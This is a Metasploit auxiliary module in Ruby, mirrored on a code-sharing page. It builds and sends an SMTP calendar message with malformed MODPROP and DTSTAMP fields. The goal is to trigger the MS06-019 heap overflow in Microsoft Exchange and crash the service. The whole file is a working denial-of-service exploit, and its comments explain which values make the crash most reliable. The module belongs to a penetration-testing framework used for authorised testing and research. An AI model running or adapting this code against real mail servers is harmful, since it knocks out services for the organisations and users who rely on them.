Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::Smtp
8
include Msf::Auxiliary::Dos
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'MS06-019 Exchange MODPROP Heap Overflow',
15
'Description' => %q{
16
This module triggers a heap overflow vulnerability in MS
17
Exchange that occurs when multiple malformed MODPROP values
18
occur in a VCAL request.
19
},
20
'Author' => [ 'pusscat' ],
21
'License' => MSF_LICENSE,
22
'References' => [
23
[ 'BID', '17908'],
24
[ 'CVE', '2006-0027'],
25
[ 'MSB', 'MS06-019'],
26
27
],
28
'DisclosureDate' => '2004-11-12',
29
'Notes' => {
30
'Stability' => [CRASH_SERVICE_DOWN],
31
'SideEffects' => [],
32
'Reliability' => []
33
}
34
)
35
)
36
37
register_options(
38
[
39
OptString.new('SUBJECT', [ true, 'The subject of the e-mail', 're: Your Brains'])
40
]
41
)
42
end
43
44
#
45
# This needs some reworking to use the SMTPDeliver mixin and the Re::MIME class
46
#
47
def run
48
connect_login
49
50
modprops = [
51
'attendee', 'categories', 'class', 'created', 'description',
52
'dtstamp', 'duration', 'last-modified',
53
'location', 'organizer', 'priority', 'recurrence-id', 'sequence',
54
'status', 'summary', 'transp', 'uid'
55
]
56
57
# modprops = ['dtstamp']
58
59
modpropshort = ''
60
modpropbusted = ''
61
modnum = rand(3)
62
63
1.upto(modnum) do
64
nextprop = rand(modprops.size)
65
modpropshort << modprops[nextprop] + ','
66
modpropbusted << modprops[nextprop].upcase + ":\r\n"
67
end
68
69
modpropshort = 'dtstamp,'
70
modpropbusted = "DTSTAMP:\r\n"
71
modnum = modnum + 1 + rand(3)
72
modproplong = modpropshort
73
1.upto(modnum) do
74
modproplong << modprops[rand(modprops.size)] + ','
75
end
76
77
boundary = Rex::Text.rand_text_alphanumeric(8) + '.' + Rex::Text.rand_text_alphanumeric(8)
78
79
# Really, the randomization above only crashes /sometimes/ - it's MUCH more
80
# reliable, and gives crashes in better spots of you use these modprops:
81
82
modpropshort = 'dtstamp,'
83
modproplong = 'dtstamp, dtstamp,'
84
modpropbusted = "DTSTAMP:\r\n"
85
86
mail = "From: #{datastore['MAILFROM']}\r\n"
87
mail << "To: #{datastore['MAILTO']}\r\n"
88
mail << "Subject: #{datastore['SUBJECT']}\r\n"
89
mail << "Content-class: urn:content-classes:calendarmessage\r\n"
90
mail << "MIME-Version: 1.0\r\n"
91
mail << "Content-Type: multipart/alternative;boundary=\"#{boundary}\"\r\n"
92
mail << "X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0\r\n"
93
mail << "\r\n"
94
mail << "--#{boundary}\r\n"
95
mail << "Content-class: urn:content-classes:calendarmessage\r\n"
96
mail << "Content-Type: text/calendar; method=REQUEST; name=\"meeting.ics\"\r\n"
97
mail << "Content-Transfer-Encoding: 8bit\r\n"
98
mail << "\r\n"
99
mail << "BEGIN:VCALENDAR\r\n"
100
mail << "BEGIN:VEVENT\r\n"
101
mail << "X-MICROSOFT-CDO-MODPROPS:#{modpropshort.chop}\r\n"
102
mail << modpropbusted
103
mail << "END:VEVENT\r\n"
104
mail << "BEGIN:VEVENT\r\n"
105
mail << "X-MICROSOFT-CDO-MODPROPS:#{modproplong.chop}\r\n"
106
mail << "END:VEVENT\r\n"
107
mail << "END:VCALENDAR\r\n"
108
mail << "\r\n--#{boundary}\r\n"
109
mail << "\r\n.\r\n"
110
111
print_status('Sending message...')
112
sock.put(mail)
113
sock.put("QUIT\r\n")
114
print '<< ' + (sock.get_once || '')
115
disconnect
116
end
117
end
118
119